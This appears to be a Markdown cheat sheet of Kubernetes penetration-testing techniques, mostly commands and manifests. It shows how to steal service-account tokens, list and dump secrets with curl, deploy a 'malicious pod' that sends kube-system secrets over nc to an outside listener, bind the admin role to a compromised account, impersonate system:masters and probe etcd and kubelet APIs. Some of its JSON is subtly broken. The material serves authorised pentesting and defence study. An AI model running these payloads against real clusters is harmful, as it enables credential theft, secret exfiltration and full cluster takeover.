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202 lines
6.7 KiB
Markdown
202 lines
6.7 KiB
Markdown
# Kubernetes
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> Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation.
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## Summary
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- [Tools](#tools)
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- [RBAC Configuration](#rbac-configuration)
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- [Listing Secrets](#listing-secrets)
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- [Access Any Resource or Verb](#access-any-resource-or-verb)
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- [Pod Creation](#pod-creation)
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- [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
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- [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
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- [Impersonating a Privileged Account](#impersonating-a-privileged-account)
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- [Privileged Service Account Token](#privileged-service-account-token)
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- [Interesting endpoints to reach](#interesting-endpoints-to-reach)
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- [API addresses that you should know](#api-addresses-that-you-should-know)
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- [References](#references)
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## Tools
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* [kubeaudit](https://github.com/Shopify/kubeaudit) - Audit Kubernetes clusters against common security concerns
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* [kubesec.io](https://kubesec.io/) - Security risk analysis for Kubernetes resources
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* [kube-bench](https://github.com/aquasecurity/kube-bench) - Checks whether Kubernetes is deployed securely by running [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/)
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* [kube-hunter](https://github.com/aquasecurity/kube-hunter) - Hunt for security weaknesses in Kubernetes clusters
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* [katacoda](https://katacoda.com/courses/kubernetes) - Learn Kubernetes using interactive broser-based scenarios
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## Service Token
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> As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod.
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```powershell
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$ cat /var/run/secrets/kubernetes.io/serviceaccount
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# kubectl makes cluster compromise trivial as it will use that serviceaccount token without additional prompting
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```
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## RBAC Configuration
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### Listing Secrets
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An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace.
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```powershell
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curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
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```
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### Access Any Resource or Verb
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```powershell
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resources:
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- '*'
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verbs:
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- '*'
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```
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### Pod Creation
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Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`.
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Then create a malicious pod.yaml file.
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```yaml
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apiVersion: v1
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kind: Pod
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metadata:
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name: alpine
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namespace: kube-system
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spec:
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containers:
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- name: alpine
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image: alpine
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command: ["/bin/sh"]
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args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
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serviceAccountName: bootstrap-signer
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automountServiceAccountToken: true
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hostNetwork: true
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```
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Then `kubectl apply -f malicious-pod.yaml`
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### Privilege to Use Pods/Exec
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```powershell
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kubectl exec -it <POD NAME> -n <PODS NAMESPACE> –- sh
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```
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### Privilege to Get/Patch Rolebindings
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The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account.
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Create a malicious RoleBinging.json file.
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```powershell
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{
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"apiVersion": "rbac.authorization.k8s.io/v1",
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"kind": "RoleBinding",
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"metadata": {
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"name": "malicious-rolebinding",
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"namespcaes": "default"
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},
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"roleRef": {
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"apiGroup": "*",
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"kind": "ClusterRole",
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"name": "admin"
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},
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"subjects": [
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{
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"kind": "ServiceAccount",
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"name": "sa-comp"
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"namespace": "default"
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}
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]
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}
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```
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```powershell
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curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json
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curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
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```
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### Impersonating a Privileged Account
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```powershell
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curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
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```
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## Privileged Service Account Token
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```powershell
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$ cat /run/secrets/kubernetes.io/serviceaccount/token
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$ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
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```
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## Interesting endpoints to reach
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```powershell
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# List Pods
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curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
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# List secrets
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curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
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# List deployments
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curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
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# List daemonsets
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curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
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```
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## API addresses that you should know
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*(External network visibility)*
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### cAdvisor
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```powershell
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curl -k https://<IP Address>:4194
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```
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### Insecure API server
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```powershell
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curl -k https://<IP Address>:8080
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```
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### Secure API Server
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```powershell
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curl -k https://<IP Address>:(8|6)443/swaggerapi
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curl -k https://<IP Address>:(8|6)443/healthz
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curl -k https://<IP Address>:(8|6)443/api/v1
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```
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### etcd API
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```powershell
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curl -k https://<IP address>:2379
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curl -k https://<IP address>:2379/version
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etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
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```
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### Kubelet API
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```powershell
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curl -k https://<IP address>:10250
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curl -k https://<IP address>:10250/metrics
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curl -k https://<IP address>:10250/pods
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```
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### kubelet (Read only)
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```powershell
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curl -k https://<IP Address>:10255
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http://<external-IP>:10255/pods
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```
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## References
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- [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1)
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- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2)
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- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) |